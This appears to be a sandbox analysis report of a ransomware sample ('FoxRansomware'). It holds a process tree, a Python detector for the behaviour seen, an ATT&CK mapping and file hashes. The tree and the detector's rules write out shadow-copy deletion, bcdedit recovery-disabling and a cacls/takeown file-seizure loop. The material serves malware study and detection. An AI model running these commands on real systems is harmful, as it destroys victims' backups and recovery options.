C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000S.bin" -nobanner3⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000S.bin" -nobanner4⤵PID:4604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""2⤵PID:780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C3⤵PID:6232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"3⤵PID:7320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000016.bin" -nobanner3⤵PID:6272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000016.bin" -nobanner4⤵PID:1296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""2⤵PID:4832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C3⤵PID:5192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"3⤵PID:5828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000050.bin" -nobanner3⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000050.bin" -nobanner4⤵PID:6360
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""2⤵PID:3952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C3⤵PID:4608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"3⤵PID:1328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000070.bin" -nobanner3⤵PID:3228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000070.bin" -nobanner4⤵PID:380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""2⤵PID:3680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C3⤵PID:2072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"3⤵PID:5280
-
-
-
[level 1, PID 4236] C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  - Sets desktop wallpaper using registry
[level 1, PID 8000] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe | fjPLyeD8.exe -accepteula "store.db" -nobanner
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  [level 2, PID 6196] C:\Users\Admin\AppData\Local\Temp\fjPLyeD864.exe | fjPLyeD8.exe -accepteula "store.db" -nobanner
    - Drops file in Drivers directory
    - Sets service image path in registry
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
[level 1, PID 7112] C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\nFhwKFc9.bat"
  [level 2, PID 1304] C:\Windows\system32\vssadmin.exe | vssadmin Delete Shadows /All /Quiet
    - Interacts with shadow copies
  [level 2, PID 4584] C:\Windows\System32\Wbem\WMIC.exe | wmic SHADOWCOPY DELETE
    - Suspicious use of AdjustPrivilegeToken
  [level 2, PID 6292] C:\Windows\system32\bcdedit.exe | bcdedit /set {default} recoveryenabled No
    - Modifies boot configuration data using bcdedit
  [level 2, PID 5276] C:\Windows\system32\bcdedit.exe | bcdedit /set {default} bootstatuspolicy ignoreallfailures
    - Modifies boot configuration data using bcdedit
  [level 2, PID 2212] C:\Windows\system32\schtasks.exe | SCHTASKS /Delete /TN DSHCA /F
[level 1, PID 5688] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe | fjPLyeD8.exe -accepteula "resource.xml" -nobanner
  - Executes dropped EXE
[level 1, PID 6340] C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
[level 1, PID 6580] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe | fjPLyeD8.exe -accepteula "background.png" -nobanner
  - Executes dropped EXE
[level 1, PID 7456] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[level 1, PID 792] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe | fjPLyeD8.exe -accepteula "DesktopSettings2013.xml" -nobanner
  - Executes dropped EXE
[level 1, PID 1848] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe | fjPLyeD8.exe -accepteula "VdiState.xml" -nobanner
  - Executes dropped EXE
[level 1, PID 7752] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe | fjPLyeD8.exe -accepteula "MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl" -nobanner
  - Executes dropped EXE
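The tree above shows two patterns worth detecting on their own: a batch script (nFhwKFc9.bat) that removes recovery options with vssadmin, wmic and bcdedit, and a per-file loop in which cmd.exe runs Qs3mgC4t.bat against one path at a time, grants the current user Full control with cacls, takes ownership with takeown, and then hands the file to the dropped fjPLyeD8.exe using Sysinternals-style switches (-accepteula, -nobanner). The detector below is an added example, not part of the sandbox report or of the sample: it runs both detections over process-creation records. The (pid, parent_pid, image, command_line) record shape and all parent PIDs are assumptions (the flattened tree records nesting level, not parent PID); the command lines are copied from the tree, and the final "benign" record is constructed.

```python
"""Detect recovery tampering and the cacls/takeown per-file loop in process records.
Added example; the record shape and parent PIDs are assumed, not taken from the report."""
import re
from collections import defaultdict

# Pattern 1: single commands that destroy recovery options (exact forms seen in the tree).
RECOVERY_RULES = [
    ("shadow-copy-deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("shadow-copy-deletion", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("recovery-disabled", re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b", re.I)),
    ("boot-failure-ignored", re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
]

# Pattern 2: cacls grants Full control and takeown takes ownership of the same path,
# both as children of one cmd.exe (the shell that runs the batch script for that file).
CACLS_FULL_RX = re.compile(r'cacls\s+"(?P<path>[^"]+)"\s+/E\s+/G\s+\S+:F', re.I)
TAKEOWN_RX = re.compile(r'takeown\s+/F\s+"(?P<path>[^"]+)"', re.I)

FOX = r"C:\Users\Admin\AppData\Local\Temp\FoxRansomware"
CACHE = r"C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache"
CMD32 = r"C:\Windows\SysWOW64\cmd.exe"
AP = CACHE + r"\000000AP.bin"
B5 = CACHE + r"\000000B5.bin"


def bat_launch(target):
    # cmd.exe /c ""<script>" "<target>"" exactly as the tree shows it
    return r'C:\Windows\system32\cmd.exe /c ""' + FOX + r'\Qs3mgC4t.bat" "' + target + '""'


# Constructed sample: command lines copied from the tree, parent PIDs assumed.
EVENTS = [
    (7112, 1, r"C:\Windows\SYSTEM32\cmd.exe", r'C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\nFhwKFc9.bat"'),
    (1304, 7112, r"C:\Windows\system32\vssadmin.exe", "vssadmin Delete Shadows /All /Quiet"),
    (4584, 7112, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic SHADOWCOPY DELETE"),
    (6292, 7112, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} recoveryenabled No"),
    (5276, 7112, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    (2212, 7112, r"C:\Windows\system32\schtasks.exe", "SCHTASKS /Delete /TN DSHCA /F"),
    # two iterations of the per-file loop; parent PID 100 for both shells is assumed
    (5816, 100, CMD32, bat_launch(AP)),
    (6484, 5816, r"C:\Windows\SysWOW64\cacls.exe", 'cacls "' + AP + '" /E /G Admin:F /C'),
    (388, 5816, r"C:\Windows\SysWOW64\takeown.exe", 'takeown /F "' + AP + '"'),
    (7452, 5816, CMD32, r'C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AP.bin" -nobanner'),
    (3020, 100, CMD32, bat_launch(B5)),
    (7456, 3020, r"C:\Windows\SysWOW64\cacls.exe", 'cacls "' + B5 + '" /E /G Admin:F /C'),
    (7532, 3020, r"C:\Windows\SysWOW64\takeown.exe", 'takeown /F "' + B5 + '"'),
    (5536, 3020, CMD32, r'C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000B5.bin" -nobanner'),
    # constructed benign control: one takeown with no cacls sibling must not be flagged
    (9001, 200, r"C:\Windows\System32\takeown.exe", r'takeown /F "C:\Tools\old.log"'),
]


def match_recovery_tampering(events):
    """Return [(pid, rule_name)] for every record whose command line matches a rule."""
    hits = []
    for pid, _ppid, _image, cmdline in events:
        for name, rx in RECOVERY_RULES:
            if rx.search(cmdline):
                hits.append((pid, name))
    return hits


def find_ownership_grab_loops(events, min_files=2):
    """Return {origin_pid: [paths]} for every process whose child shells each ran
    cacls (Full control) and takeown on the same file, for at least min_files files."""
    parent_of = {pid: ppid for pid, ppid, _image, _cmd in events}
    granted = defaultdict(set)  # shell pid -> paths given Full control
    owned = defaultdict(set)    # shell pid -> paths whose ownership was taken
    for _pid, ppid, _image, cmdline in events:
        m = CACLS_FULL_RX.search(cmdline)
        if m:
            granted[ppid].add(m.group("path").lower())
        m = TAKEOWN_RX.search(cmdline)
        if m:
            owned[ppid].add(m.group("path").lower())
    per_origin = defaultdict(set)
    for shell_pid in granted.keys() & owned.keys():
        for path in granted[shell_pid] & owned[shell_pid]:
            per_origin[parent_of.get(shell_pid)].add(path)
    return {origin: sorted(paths) for origin, paths in per_origin.items()
            if len(paths) >= min_files}


def triage(events):
    return {"recovery_tampering": match_recovery_tampering(events),
            "ownership_grab_loops": find_ownership_grab_loops(events)}


if __name__ == "__main__":
    for key, value in triage(EVENTS).items():
        print(key, value)
```

Two caveats when running this over real telemetry. First, key processes by a unique process identity rather than by PID alone: the tree above already shows PID 7456 and PID 1848 each assigned to two different processes within one run, so parent-child grouping by bare PID needs a start time or a Sysmon ProcessGuid alongside it. Second, a single takeown or cacls is routine administration; the signal here is the repetition of the cacls-plus-takeown pair over many files under one parent, which is why the loop detector counts distinct paths per origin instead of alerting per command.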
Network
MITRE ATT&CK Enterprise v15
- Persistence
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
  - Scheduled Task/Job (1)
- Privilege Escalation
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
  - Scheduled Task/Job (1)
- Defense Evasion
  - File and Directory Permissions Modification (1)
  - Indicator Removal (2)
    - File Deletion (2)
  - Modify Registry (2)
Downloads
- Filesize: 8KB
  MD5: 0290f3cde6cbb18e33024cca8854e68a
  SHA1: bea7b69a3c44a849586646ae76016f38b53628bb
  SHA256: 3c5f38bbb0a9f4ccc34eb340c7f44bd4590cdc9ffaa2b1ef74645f406980ab54
  SHA512: 5e5c133c07c875d71ab605e2db2db1198aa1a7ddfe484d1f6da0270c4433b7cf8755bc214efcc8390604d7580e9fa380e43ffe8798ddf554dab313421da5adae
- Filesize: 3KB
  MD5: 31cd79d3c243f1d199b4a58c8d89255d
  SHA1: 97507be9859529f0638300ba5aa964c9c5b2ad7d
  SHA256: c956664c79a9aa1243bea3fc8a4703bfce53ea5759a01d4782fb6bd71a632043
  SHA512: 1b054a8c4ead71ceef5872e61d62d4ba3bfe80c429090228a1486141783d7aa2e8d22d692267427101b531987947b02aa275904d2eb97336ffdf65f53bdd6f85
- Filesize: 14B
  MD5: c74dacdd9331a6698efffe81ff66ac08
  SHA1: 79e8ce4bb5cc2436e95fad4a74a31aee7aa63043
  SHA256: 82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
  SHA512: 24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
- Filesize: 1.2MB
  MD5: 268360527625d09e747d9f7ab1f84da5
  SHA1: 09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
  SHA256: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
  SHA512: 07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
- Filesize: 226B
  MD5: 74328bf655d1668c8fad21b18157df0e
  SHA1: 1c2ffb5bc05bfe150d87958bf15de23c70e86acb
  SHA256: fbdb0c18c96f41fae2ced419565dada156559137cb07a4bebf052e38a154a257
  SHA512: 93a147cb39a01e2bbc034eca2e174f93ed4f0ec374941d6276192d7f589fb8a3a3560f32edc9753f9d9fbb4b1757c77b107f723d6347e96cdcb28d533395cca4
- Filesize: 11KB
  MD5: cbcb443a950f3486283d5a470505a72c
  SHA1: 2d596319bce316e35f00c1c4512a0380e3cc0890
  SHA256: b1bc0bd456a2fd0bdada369977b98a1c2e343c7ce0904201b40de52776d1d706
  SHA512: 5276c0e7a4b794577aa2ed16ecdb95c12251b8d95e54ee4aff4e9eefc1160c8c16941d63da9faf025d2ba023fbdbe4c5208bc624b953c7ee8fd275d61a5ce3c6
- Filesize: 20KB
  MD5: fe91d908dec8a9ff4a2ffe8e08e52d56
  SHA1: ef6b87d589cc74b02b70f62e8a4185976abc2333
  SHA256: 649ba5b359197ba91c07ecce259bee1f808945e5bf03407e93569fd747d03405
  SHA512: f03054daad924a8555ba6bcd24c63d94c673e62493ccb6b208246d434de08b0c60cd26cf88e2f2ff94b01730a2ed0197f636a4e3f9ab3fcb5fba524d4ac62474
- Filesize: 181KB
  MD5: 2f5b509929165fc13ceab9393c3b911d
  SHA1: b016316132a6a277c5d8a4d7f3d6e2c769984052
  SHA256: 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
  SHA512: c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
- Filesize: 64KB
  MD5: 39384617afb7b1a4cd7b11d998292e13
  SHA1: 87689603aebba6b353bbca3d5a038c0e8e59fd4c
  SHA256: b41666aedfb669305f37349dfae96eea3f34ae7ba89629a268c2a403302bdbaa
  SHA512: 52be3914e3330330a83463cc2925ffa5d0bdb1a4358f48c1298cc0c5f631a214a8d9328232f95c496642da2300f713a5f0288d6ea6af52fb0e173c1431e442e7
- Filesize: 148KB
  MD5: 57e9781c9df97dc75d36225cdcf91d81
  SHA1: 60527e353c7426c07c055484892b41f61de8ca2d
  SHA256: 62cd6df900772a77947946e0787b718cbe5b79cc1e72d42cbda3c60fe74bc9c4
  SHA512: a45f63a58b68310c7f9169e39fe0965fa3a326f309d611a093ccad425afd80b6b7b2c2b0061412265b804f5945335c6026bb5506b9830d7896e8bbb0575245e5
- Filesize: 7KB
  MD5: 910f4a592588255c8969b6c3b2c94667
  SHA1: c844710f0b67b036c4f61405b42991b987d3ae84
  SHA256: d8bf7bce39575d81b4f60c580964055dea85579f35a592ef08aff52a661e5e44
  SHA512: f94b043100f012b1359ceb00c0b62888fa2b792b4f25c8394dd9eca010ec7afa9f75345b8bb494506e0fb9090ba126eefea72c033fe6acc6a068fb547b04e4eb
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 221KB
  MD5: 3026bc2448763d5a9862d864b97288ff
  SHA1: 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
  SHA256: 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
  SHA512: d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
- Filesize: 260B
  MD5: 3b31b94a434deb7c089b8377a2654b55
  SHA1: cf0481de7f8c0b0fb82d79ce63e4c3a2d645fd8f
  SHA256: de50ce100aec51545acd8aebb434dd7e8dbef2c8e4259502c3eaf182d679eabf
  SHA512: aff2db196af16a7a6565450fa6412ef4cd96b675cc80664da2eabadcd636b89c517f8564c4e248344c727bef8168197c0f869463b036966ef5a0611c6dbe85ea
- Filesize: 265B
  MD5: 31125acaf5d8249eaad18f3445aab266
  SHA1: d7baf60766e4b20ec9d18b8122d02973acc23fa3
  SHA256: 36cce2c4949e936704308b73476f6c724039443d8e52a4bd8f82388d29425636
  SHA512: 6d90ce10d87008b7cb159b85fb8520434e675e55dee88b4dac54bb91bd428e1813323e4ca70136c0ddf4ad906ddc57225f0f2c78b09051b1faa3f2a16cfc10f1